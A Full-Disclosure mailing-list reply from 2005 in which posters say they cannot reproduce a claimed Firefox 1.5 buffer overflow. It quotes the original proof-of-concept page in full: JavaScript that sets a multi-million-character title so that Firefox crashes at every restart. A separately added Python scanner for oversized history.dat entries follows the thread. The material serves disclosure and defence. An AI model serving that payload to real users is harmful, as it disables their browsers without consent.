List: full-disclosure
Subject: Re: [Full-disclosure] re: Firefox 1.5 buffer overflow (poc)
From: Ron <iago () valhallalegends ! com>
Date: 2005-12-08 16:19:59
Message-ID: 43985D2F.9040902 () valhallalegends ! com
I was also unable to replicate it on Firefox 1.5 i386 Linux EN.
ad@heapoverflow.com wrote:
> Neither a fake, nor do you really not know what a buffer overflow is, but for
> sure here on my Firefox 1.5 EN, the client takes much longer to load at
> the next boot but it reloads fine without exceptions and there is
> nothing about a security bug here...
>
>
>> <!-- Firefox 1.5 buffer overflow
>>
>> Basically Firefox logs all kinds of URL data in its history.dat file.
>> This little script will set a really large topic and Firefox will then
>> save that topic into its history.dat. The next time that Firefox is
>> opened, it will instantly crash due to a buffer overflow -- this will
>> happen every time until you manually delete the history.dat file -- which
>> most users won't figure out.
>>
>> This proof of concept will only prevent someone from reopening
>> their browser after being exploited. DoS if you will. However, code
>> execution is possible with some modifications.
>>
>> Tested with Firefox 1.5 on Windows XP SP2.
>>
>> ZIPLOCK <sickbeatz@gmail.com>
>>
>> -->
>> <html><head><title>heh</title><script type="text/javascript">
>> function ex() {
>>     // 5000 'A's, then appended 500 more times: about 2.5 million characters
>>     var buffer = "";
>>     for (var i = 0; i < 5000; i++) {
>>         buffer += "A";
>>     }
>>     var buffer2 = buffer;
>>     for (i = 0; i < 500; i++) {
>>         buffer2 += buffer;
>>     }
>>     // the oversized title is what Firefox later writes into history.dat
>>     document.title = buffer2;
>> }
>> </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
>> </a></body></html>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
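A defensive check, added here and not part of the thread or of Mozilla's code: it scans a history.dat for cell values far larger than any real page title, so an oversized title like the one the PoC writes can be located before the whole file is deleted. It assumes the Mork conventions that cells appear as `(key=value)` with `)` escaped as `\)` and that a trailing backslash continues a line; the threshold and the sample content are constructed.

```python
import re
from typing import List, Tuple

# Anything above this many characters is far beyond a real page title
# (threshold is an assumption, not a Firefox constant).
MAX_VALUE_LEN = 64 * 1024

# Assumed Mork layout: cells are "(key=value)" and a ")" inside a value
# is escaped as "\)".
_CELL = re.compile(r"\(([^=()]+)=((?:\\.|[^)\\])*)\)", re.S)


def join_continuations(text: str) -> str:
    """Undo assumed Mork line continuation: a backslash right before a newline."""
    return re.sub(r"\\\r?\n", "", text)


def find_oversized(text: str, limit: int = MAX_VALUE_LEN) -> List[Tuple[str, int]]:
    """Return (key, length) for every cell value longer than `limit`."""
    hits = []
    for m in _CELL.finditer(join_continuations(text)):
        key, value = m.group(1), m.group(2)
        if len(value) > limit:
            hits.append((key, len(value)))
    return hits


def scan_file(path: str, limit: int = MAX_VALUE_LEN) -> List[Tuple[str, int]]:
    """Scan a history.dat on disk; latin-1 decoding never fails on arbitrary bytes."""
    with open(path, "r", encoding="latin-1") as fh:
        return find_oversized(fh.read(), limit)


# Constructed sample: two ordinary cells plus one title padded with "A"s
# and wrapped over two lines the way a long Mork value would be.
SAMPLE = (
    "<(80=http://example.invalid/)(81=Example title)\n"
    "(82=" + "A" * 60 + "\\\n" + "A" * 60 + ")>\n"
)

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    hits = scan_file(target) if target else find_oversized(SAMPLE, limit=100)
    for key, length in hits:
        print(f"cell {key}: value is {length} characters, far beyond any real title")
    if not hits:
        print("no oversized values found")
```

Run it with the path to a profile's history.dat to list the offending cells; with no argument it runs against the constructed sample using a low threshold.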